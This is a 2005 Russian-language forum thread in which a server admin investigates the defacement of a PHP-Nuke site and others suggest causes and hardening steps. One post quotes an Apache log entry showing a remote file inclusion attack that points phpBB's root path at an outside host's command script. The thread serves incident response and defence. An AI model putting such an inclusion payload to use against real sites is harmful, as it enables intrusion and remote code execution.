форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение		[Проследить за развитием треда]

"Хакнули сайт а может сервер? Помогите разобраться."
Сообщение от mihas (??) on 07-Дек-05, 16:54  (MSK)
Не совсем уверен в правильности выбора раздела, но уж больно помощь нужна. Вобщем есть у меня сервер на нем Debian 3.1 На сервере пару сайтов. Все вроде нормально, вчера в 18.00 Вместо главной страницы одного из сайтов вижу надпись Thehacker..... Оказалось этот Thehacker изменил файл index.php У меня еще не большой опыт в администрировании серверов, поэтому прошу помощи. Сам сайт этот работает на phpnuke. Но я уверен, что взломали не сайт, но как получили доступ к этому файлу я никак не разберусь. В логах на то время только следующее Dec  6 18:00:04 localhost proftpd[22291]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER anonymous: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21 Dec  6 18:00:06 localhost proftpd[22292]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER anonymous: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21 Dec  6 18:00:10 localhost proftpd[22295]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER anonymous: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21 Dec  6 18:00:27 localhost proftpd[22301]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER mick-ashim: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21 Dec  6 18:01:27 localhost proftpd[22334]: localhost (ppp129-63.dialup.mtu-net.ru[62.118.129.63]) - USER mick-ashim: no such user found from ppp129-63.dialup.mtu-net.ru [62.118.129.63] to xx.xx.xxx.xxx:21 Вроде как ничего криминального, но время совпадает со временем изменения файла index.php Больше ничего в логах не нашел. На руткиты проверял, пусто, лишних открытых портов тоже нет. Создается впечатление что вошли по ftp, но как? Буду очень признателен за помощь.
	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

Сообщения по теме

[Сортировка по времени, UBB]

1. "Хакнули сайт а может сервер? Помогите разобраться."
Сообщение от pagan on 07-Дек-05, 17:19  (MSK)
скорее всего поломали через дырявый phpnuke. Небось залили web шелл, ну а далее все понятно ;-) Общая рекомендация: до выяснения того что и как поломали машину отключить от сети.
Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	2. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от mihas (??) on 07-Дек-05, 17:35  (MSK)
	>скорее всего поломали через дырявый phpnuke. Небось залили web шелл, ну а >далее все понятно ;-) Нет, мне к сожалению не понятно. Правда. Если залили, то что он получил, доступ в админку? Пароли? Как содержимое самого файла изменили? Значит доступ по ftp получил? >Общая рекомендация: до выяснения того что и как поломали машину отключить от сети. Так весь вопрос в том, как это выяснить. Я уже все логи пересмотрел, ничего, по крайней мере с моей точки зрения, не нашел.
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	3. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от Serge (??) on 07-Дек-05, 18:17  (MSK)
	Привет! Сегодня на вывесили на опеннете http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus.txt "Работники учебного центра Информзащита перевели на русский язык текст документа "Web Security Threat Classification", в котором классифицированы основные виды атак на web-приложения, с подробным описанием, примерами и рекомендациями по защите." Читай, может поможет ...
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	4. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от mihas (??) on 07-Дек-05, 18:45  (MSK)
	>Привет! > >Сегодня на вывесили на опеннете http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus.txt > >Читай, может поможет ... Спасибо почитаю. Может еще кто чем поможет? Что дальше то делать?
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

5. "Хакнули сайт а может сервер? Помогите разобраться."
Сообщение от vvvua (ok) on 07-Дек-05, 23:52  (MSK)
Был у меня на хостинге одно время сайт president.com.ua. Он тоже на нюке. Во время выборов его валили вместе с серваком раз в 2 часа. DDOS на форум и регистрацию, в основном. Сервак сам по себе не падал, но страницы не грузились. К нюке есть куча секъюрити патчей - без них это голая жопа в интернете с соответсвующими последствиями. И вообще, в debian лучше vsftd поставить с чрутом по ману к нему. А искать нужно в логах на доступ к страницам - в апаче, а не к фтпд. last -i покажет кто куда входил по ftp. Если чисто или пропали логи - значит рут шелл был - пора все менять, ЖОПА.
Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	6. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от mihas (??) on 08-Дек-05, 00:15  (MSK)
	>last -i покажет кто куда входил по ftp. Спасибо. Вот это уже по делу. На ftp значит кроме меня никого не было. По шелу тоже один я был. Про апач уже понял, пытаюсь что то найти, но пока голяк. Может подскажешь как сузить границы поиска, что именно искать и как можно вообще в логах искать, может какие то команды есть. А то у меня уже глаза выпадают. А нюку я собирался сносить, как раз другой движок готовлю, думал где то через неделю переезжать и на тебе.
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	7. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от vvvua (ok) on 08-Дек-05, 00:50  (MSK)
	Вот с этим уже не очень помогу- давно было, запамятовал. Теоретичеки - посмотреть время модификации файла (ls -l index.php) и ищи его, время т.е., в логах апача. Кроме того, проверь может ли кто анонимно писать на сервак под фтп. ЗАКРОЙ фунции system,exec,... в PHP (php.ini править надо апачевский). 90%, что шелл скрипт через него исполнили. На будущее - поставь tripwire на систему и не забудь на файловые системы прописать в фстабе noatime. Это загрузку винтов уменьшит и трипвайр ругаться не будет. На админ часть точно пароли спрашивает? .htaccess работает? если да, то желательно файл с паролями поместить в поддиректорию и прописать туда order allow,deny deny from all тогда напрямую никто не вломится.
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	8. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от mihas (??) on 08-Дек-05, 01:45  (MSK)
	>Теоретичеки - посмотреть время модификации файла (ls -l index.php) и ищи его, время т.е., в логах апача. Время изменения знаю, только пока в тех границах пока ничего не нарыл. >Кроме того, проверь может ли кто анонимно писать на сервак под фтп. Т.е.? Имеет ли кто анонимный доступ по ftp? Нет. >На будущее - поставь tripwire на систему и не забудь на файловые >системы прописать в фстабе noatime. Это загрузку винтов уменьшит и >трипвайр ругаться не будет. Интересно, я о tripwire первый раз слышу, надо почитать. >На админ часть точно пароли спрашивает? >.htaccess работает? если да, то желательно файл с паролями поместить в >поддиректорию и прописать туда >order allow,deny >deny from all >тогда напрямую никто не вломится. Админка закрыта со всех сторон и через .htaccess тоже. Конфиг файл спрятан за семью замками. Спасибо за полезную информацию. Буду искать дальше, если что найду отпишусь.
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	9. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от Xmas (??) on 08-Дек-05, 04:22  (MSK)
	1. Насчет открытых портов, просканируйте себя из вне nmap'ом каким-ть+демкой XSpider'а 2. на сколько я понял, вы хотите переходить на самописный движок? тоже не советую, по крайней мере сейчас, вот погонять его в тестовом режиме это можно, но сразу ставить не рекомендуется 3. на всякий пожарный пробегитесь chkrootkit'ом авось он все-таки еще че-ть нароет 4. и опять же совет на будущее, как уже подсказали чрутить апач и иже с ними, это конечно не панацея от всех бед, но головной боли будет поменьше :)
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	10. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от joik on 08-Дек-05, 08:01  (MSK)
	в принципе правильные советы. по опыту - ничего не случилось. скрипткиддисы. реальный хак никогда бы не вылез наружу. только внутрь. в сердце системы. с добавлением разных скановв, снифоф, баков, шелеф :) поставь спецом приманку - посмотришь..
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	11. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от mihas (??) on 08-Дек-05, 10:44  (MSK)
	>1. Насчет открытых портов, просканируйте себя из вне nmap'ом каким-ть+демкой XSpider'а nmapom сканил и неоднократно, снутри и снаружи, все в порядке, ничего лишнего не открыто. XSpider вчера запускал, правда не дождался окончания его работы, сайт довольно крупный. А ему вообще можно верить? Он нашел очень много проблем, причем если эти проблемы в нюке, то это понятно, но он нашел также много проблем и на других сайтах, которые работают на коммерческих надежных скриптах. >2. на сколько я понял, вы хотите переходить на самописный движок? тоже не >советую, по крайней мере сейчас, вот погонять его в тестовом режиме это можно, но сразу ставить не рекомендуется Нет. Движок не самописный. Коммерческий. У нас он не очень известен, но в Германии один из самых популярных и надежных. Если интересно вот сайт разработчика http://www.woltlab.de/ >3. на всякий пожарный пробегитесь chkrootkit'ом авось он все-таки еще че-ть нароет Уже раз 10 запускал, говорит пусто. >4. и опять же совет на будущее, как уже подсказали чрутить апач и иже с ними, это конечно не панацея от всех бед, но головной боли будет поменьше :) А можно чуть подробнее, я еще не большой спец в этих вопросах. Что такое чрутить я представляю, но как чрутить апач не совсем. Или, если можно,  ссылочку. >в принципе правильные советы. >по опыту - ничего не случилось. >скрипткиддисы. >реальный хак никогда бы не вылез наружу. только внутрь. в сердце системы. >с добавлением разных скановв, снифоф, баков, шелеф :) >поставь спецом приманку - посмотришь.. Поизучав немного материалы, спасибо предыдущим ораторам, все таки склоняюсь к тому, что ломанули нюку и просто переписали index.php Это логично, я давно не обновлял ее, да еще под нюкой phpbb стоит, он тоже версии 2.0.17 хотя вышла уже 2.0.18. Обновляться не хотел, готовлю переход на другой движок, не до этого было.
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	12. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от vvvua (ok) on 08-Дек-05, 11:25  (MSK)
	Точно! Вспомнил! Около 3-х сайтов ломали через phpbb. Там есть возможность поста файла где-то! А потом system его и вперед! >ломанули нюку и просто переписали index.php Это логично, я давно не >обновлял ее, да еще под нюкой phpbb стоит, он тоже версии
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	13. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от ram_scan on 08-Дек-05, 11:59  (MSK)
	>>ломанули нюку и просто переписали index.php Это логично, я давно не >>обновлял ее, да еще под нюкой phpbb стоит, он тоже версии Поставить ин продакшн phpnuke или phpbb имхо может только отбитый во всю голову человек. Потому-что если по рассылке вдруг не анонсится репорт о свежей уязвимости в этих двух горбухах то я начинаю нервничать что "сегодня что-то идет не так". Обычно свежая дыра - каждый день. Эти поделия надо апдейтить раз в сутки, и все равно "ачько узкий-узкий" (c).
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	14. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от mihas (??) on 08-Дек-05, 23:48  (MSK)
	Нашел в логах на тот день такую запись 85.98.167.87 - - [06/Dec/2005:19:42:39 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.slototal.com/cmd.dat?&cmd=id HTTP/1.1" 200 5956 Повторяется она раз 7. Но на момент изменения файла index.php в логах пусто.
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

	15. "Хакнули сайт а может сервер? Помогите разобраться."
	Сообщение от vvvua (ok) on 13-Дек-05, 16:52  (MSK)
	>Нашел в логах на тот день такую запись >85.98.167.87 - - [06/Dec/2005:19:42:39 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.slototal.com/cmd.dat?&cmd=id HTTP/1.1" 200 5956 >Повторяется она раз 7. Но на момент изменения файла index.php в логах >пусто. Это тоже хак. Ссылочку открой, что подставлена в phpbb_root_path...
	Удалить	Правка | Высказать мнение | Ответить | Рекомендовать в FAQ | Cообщить модератору | Наверх

Архив | Удалить	Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ]